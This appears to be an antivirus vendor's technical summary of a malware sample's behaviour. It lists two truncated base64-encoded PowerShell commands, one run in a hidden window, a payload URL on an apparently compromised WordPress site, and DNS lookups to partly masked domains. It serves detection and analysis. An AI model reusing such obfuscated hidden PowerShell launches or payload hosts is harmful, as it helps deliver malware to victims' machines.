Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgAHMAZQBUAC0AVgBBAFIASQBhAEIAbABlACAAIAAoACcAOQA2ACcAKwAnAGUAMwAnACkAIAAoACAAIABbAHQAWQBQAEUAXQAoACIAewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAgAC0AZgAgACcALgBJAE8AJwAsACcAcw...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1588
- %TEMP%\1180225.cvr
- '9s##.com':443
- http://ho####tchamelia.com/wp-admin/MQxjrRU/
- DNS ASK ho####tchamelia.com
- DNS ASK po######ousedurban.co.za
- DNS ASK to##ak.ie
- DNS ASK bi#.ly
- DNS ASK th####library.de
- DNS ASK co######udelien.fbcars.net
- DNS ASK ma##c.top
- DNS ASK jw###ncare.vn
- DNS ASK 9s##.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgAHMAZQBUAC0AVgBBAFIASQBhAEIAbABlACAAIAAoACcAOQA2ACcAKwAnAGUAMwAnACkAIAAoACAAIABbAHQAWQBQAEUAXQAoACIAewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAgAC0AZgAgACcALgBJAE8AJwAsACcAcw...' (with hidden window)